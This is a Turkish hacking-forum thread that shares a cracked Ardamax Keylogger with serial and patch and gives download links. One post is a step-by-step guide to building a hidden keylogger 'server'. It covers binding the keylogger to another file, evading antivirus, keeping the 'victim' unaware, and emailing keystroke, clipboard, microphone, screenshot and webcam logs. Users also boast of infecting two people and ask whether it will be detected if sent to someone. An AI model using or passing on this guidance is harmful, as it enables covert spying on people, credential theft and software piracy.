Ardamax Keylogger 5.2 TR Full + Serial + Patch

FAFD38700

Yeni üye
30 May 2013
37
0
aze81OX.png

Merhaba arkadaşlar...
Çoğumuz zaten Ardamax Keylogger'i biliyoruz veya bir yerden duymuşuzdur..
Ardamax keylogger piyasada çokca bulunan keyloggerlardan sadece biri ama gerek kullanım kolaylığı gerekse özellikleriyle diğer keyloggerlardan ayrılıyor.

--------İNDİRME LİNKLERİ----------

Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam

---------VİRÜS TOTAL--------

https://www.virustotal.com/tr/file/...4eb3eab7e5068d9a3e933680de996f0185f/analysis/

Rar Şifresi: turkhackteam.net​

TEŞEKKÜR ETMEYİ UNUTMAYALIM LÜTFEN!!!

ya çokmteşşekkür ederim bununda kurulumunu kyarmısın

FAFD38700

Yeni üye
30 May 2013
37
0
yaptım teşşekür ederim gayette güzel çelışıyor şuan 2kişi de yüklü kısmet bakalım :)

godmasar

Katılımcı Üye
17 Şub 2012
397
1
İstanbul

portakal00

Katılımcı Üye
3 Haz 2013
314
0
Arkadaşlar öncelikle ardamax keyloggerın yeni versiyonları çıktığı için eskilerinin kurulumu yapılamıyor yada 3.9 versiyonu düzgün log göndermiyordu bende öyleydi düzgün log göndermiyordu 4.0.1 versiyonu çıktı ve forumda bununla ilgili konu vardı fakat fazla ayrıntılı değildi bende açma gereği duydum ve bu konuyu açtım.

Öncelikler Biraz Özelliklerinden Bahsedelim(neler alabiliyor yeni özellikelr neler öneclikelr onları gösterelim):
Virüsün Nereye Kurulacağı:
Hedef bilgisayar programın nereye kurulabileceği özelliğği eklendi 3.9 da bu yoktu ve bence iyi oldu çünkü çoğu antiviürs bilgisayrın ilk açılışnda kritik bölgeleri şöyle bi gözden geçiriyor benim kullandığım öyle ve virüsü bulup silebiliyor ama siz burdan nerey kurlucağanı değiştirirseniz bu risk azalmış olur
Herhangi Bir Uygulamayla Birleştirme:
Bu özellik zaten vardı diye anlatmaya gerek duymuyorum.
Log'ların Kaydedileceği Yer:
Bence önemli özelliklerden biri de bu çünkü loglar birleşip büyüdükçe harddiskde yer kaplayacaktır ve kullanıcıda bunu farkına varacaktır o yüzden yer değiştirirsek bu özelliğin faydalı olacağını düşünüyorum
Başarıyla Gönderilen Log'ların Temizlenmesi:
Güzel Özelliklerden biriside bu üstteki ile bağlantılıdır başarıyla gönderdiği log'ları otomatik olarak temizleyerek log'ların harddiskte yer kaplamamasını sağlar
Panoya Kopyalanan Metinlerin Alınması:
CTRL+C ile bi yerden kopyalan yazıların logunu alır böyle trojan yediğini düşünenler şifresini not defterine karışık şekilde yazarda ordan seçip kopyala-yapıştır yapar ya onun için bu özellik
Mikrofon Logu:
Kullanıcını mikrofonu varsa mikrofona gelen sesleri kaydeder
Yeni Eklenen Özellikler Bu Kadardır Şimdi Programın Kurulumu, Patch'in Çalıştırılması ve Serial'in Kaydedilmesine Geçiyorum:

Öncelikle Winrar'dan Çıkarıyoruz:

Daha sonra install_akl den kurulumu yapıyoruz:

Patch dosyasını kopyalıyoruz:

Programın kurulu olduğu yere gidiyoruz:

Patch dosyasını yapıştırp Patch dosyasını çalıştırıyoruz:

Karşımız gelen bu ekranda Patch yazısına tıkladığımzda böyle birşey geldiyse patch işlemi tamamdır:

Patch programını kapatıp sus.exeyi açıyoruz:

Sağ tıklayıp enter registration key'e tıklıyoruz:

Bu ekranda registration adlı metin belgesindeki bilgilere göre doğru bi biçimde yazıp OK'a tıklıyoruz:

Böyle bi ekran geldiyse işlem tamadır tamam'a tıklayın:

Daha sonra gene ikona sağ tıklayıp Remote Installation'a tıklıyoruz:

Bu ekranda İleri'ye tıklıyoruz:

Burdan virüsün nereye kurulacağını seçiyoruz:

Burda herhangi bir dosyayla birleştireceksek kutucuğu işaretleyip Browse'den o dosyayı seçiyoruz:

Burada görünmezlik ayarları vardır tavsiye olarak hepsi seçili olsun:

Bu ekranda eğer siz programa şifre koyduysanız böyle görünür ben koydum o yüzden böyle görünüyor burayıda geçiyoruz:

Burada log'ların nereye kaydedileceğini seçiyoruz hazır seçimler var ben onları tavsiye ederim:

Burada bu iki kutucuğu işaretleminizi kesinlikle tavsiye ediyorum kurbanın çakmaması için ve bana logları 30 dk'da bir göndermesi için ayarlıyorum:

Burada ise hangi logları tutup tutmayacağını işaretliyoruz:

Şimdi en ince ayrıntıya gelelim bu işmizi bitirdikten sonra bir kere "Geri" tuşuna basarak e-posta ayarlamalrını yapıyoruz ve test ediyoruz:

İki kere "İleri"ye tıklıyoruz. Burada kaç dk'da bir ekran görüntüsü alcağını ve netliğini ayarlıyoruz ben dk'da bir %99 kalitede ekran görüntüsü almasını istiyorum:

Burada kaç dk'da bir webcam görüntüsü alcağını ve netliğini ayarlıyoruz ben 5 dk'da bir %99 kalitede ayarlıyorum:

Bu ekranda server.exe'nin ikonunu değiştirebilirsiniz ikonumuzu varsayılan olarak seçiyorum ve "İleri'ye tıklıyorum:

Ve mutlu son'a geliyoruz "Son'a tıklayıp server'imizi oluşturuyoruz:

İşte bu kadar sıra indirme linkinde:
https://hotfile.com/dl/195860310/08e9c71/Ardamax_Keylogger_4.0.rar.html
Buda VirüsTotal:
https://www.virustotal.com/tr/url/1...5ab87159ddb1b7423e56c0e6/analysis/1361771309/
Anlatımı kendi ellerimde yazdım ama winrar alıntıdır

tesekur edın sevınek :D

FAFD38700

Yeni üye
30 May 2013
37
0
bilip bilmeden herşeyi konuşma konum adı sadece 4.0 içeriyodu üst yönetim o konuyu silipi adını değiştirmiş konununun. bilip bilmeden atlama .

chrome dışında başka bir tarayıcıyla dene frefoxla falan.
neye bilip bilmeden atlamayım sana bişey dediğim yok sen her şeye atlama ben abimize teşekkür ettim aynı yerde oda paylaşmış bilmem dikkatini çektimi?

uaking96

Yeni üye
11 Eyl 2010
1
0
Güncel mı kardeş? Bide birisine yollasam internetten winrarın içinde virüs programı algılar mı??

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.